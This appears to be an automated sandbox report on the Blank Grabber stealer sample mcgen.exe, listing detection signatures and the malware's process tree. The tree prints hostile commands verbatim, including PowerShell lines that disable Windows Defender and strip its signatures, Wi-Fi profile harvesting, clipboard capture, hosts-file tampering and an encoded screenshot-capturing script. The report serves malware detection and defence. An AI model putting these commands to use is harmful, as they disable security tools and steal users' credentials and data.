Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
mcgen.exe

Overview

General Information

Sample name:mcgen.exe
Analysis ID:1583242
MD5:211da2d6a5b8b04b49d1c837eecee46c
SHA1:4abdbb0e47fc77ec67348f73e47e526dbdd1dc1f
SHA256:17e89140548fc71f7670ea5ee7df6feab0101386b8d087a81056ac6812d77a51
Tags:exeQuasarRATuser-lontze7
Infos:

Detection

Blank Grabber
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Suricata IDS alerts for network traffic
Yara detected Blank Grabber
Yara detected Telegram RAT
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
Check if machine is in data center or colocation facility
Encrypted powershell cmdline option found
Found many strings related to Crypto-Wallets (likely being stolen)
Found pyInstaller with non standard icon
Loading BitLocker PowerShell Module
Modifies Windows Defender protection settings
Modifies existing user documents (likely ransomware behavior)
Modifies the hosts file
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Removes signatures from Windows Defender
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Sigma detected: Rar Usage with Password and Compression Level
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious Ping/Del Command Combination
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Sigma detected: Suspicious Startup Folder Persistence
Suspicious powershell command line found
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses attrib.exe to hide files
Uses cmd line tools excessively to alter registry or file data
Uses netsh to modify the Windows network and firewall settings
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Uses the Telegram API (likely for C&C communication)
Writes or reads registry keys via WMI
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI
Sigma detected: Powershell Defender Exclusion
Sigma detected: SCR File Write Event
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious Screensaver Binary File Creation
Stores files to the Windows start menu directory
Too many similar processes found
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer

Classification

  • System is w10x64
  • mcgen.exe (PID: 3212 cmdline: "C:\Users\user\Desktop\mcgen.exe" MD5: 211DA2D6A5B8B04B49D1C837EECEE46C)
    • mcgen.exe (PID: 7020 cmdline: "C:\Users\user\Desktop\mcgen.exe" MD5: 211DA2D6A5B8B04B49D1C837EECEE46C)
      • cmd.exe (PID: 6104 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\mcgen.exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 4460 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\mcgen.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 3196 cmdline: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 4072 cmdline: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend MD5: 04029E121A0CFA5991749937DD22A1D9)
        • MpCmdRun.exe (PID: 7224 cmdline: "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All MD5: B3676839B2EE96983F9ED735CD044159)
      • cmd.exe (PID: 1444 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 2300 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 3796 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 4600 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 3384 cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 3524 cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2 MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • cmd.exe (PID: 6540 cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 1212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 2788 cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2 MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • cmd.exe (PID: 6260 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 3416 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 3796 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7108 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 1924 cmdline: C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\Desktop\mcgen.exe"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • attrib.exe (PID: 1088 cmdline: attrib +h +s "C:\Users\user\Desktop\mcgen.exe" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
      • cmd.exe (PID: 5200 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7036 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 3416 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 3816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 5440 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 5040 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 3552 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 2912 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 4412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7448 cmdline: powershell Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 6104 cmdline: C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7556 cmdline: WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 6312 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 1444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 7508 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 5608 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 7324 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 3660 cmdline: C:\Windows\system32\cmd.exe /c "netsh wlan show profile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 3664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • netsh.exe (PID: 7464 cmdline: netsh wlan show profile MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
      • cmd.exe (PID: 7232 cmdline: C:\Windows\system32\cmd.exe /c "systeminfo" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7288 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • systeminfo.exe (PID: 7456 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)
      • cmd.exe (PID: 7248 cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 7472 cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • cmd.exe (PID: 7272 cmdline: C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7524 cmdline: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA= MD5: 04029E121A0CFA5991749937DD22A1D9)
          • csc.exe (PID: 7856 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ppw2wipr\ppw2wipr.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
            • cvtres.exe (PID: 7956 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8ED.tmp" "c:\Users\user\AppData\Local\Temp\ppw2wipr\CSC774215641B8D46CBA5382B343227E316.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
      • cmd.exe (PID: 7724 cmdline: C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • attrib.exe (PID: 7820 cmdline: attrib -r C:\Windows\System32\drivers\etc\hosts MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
      • cmd.exe (PID: 7880 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
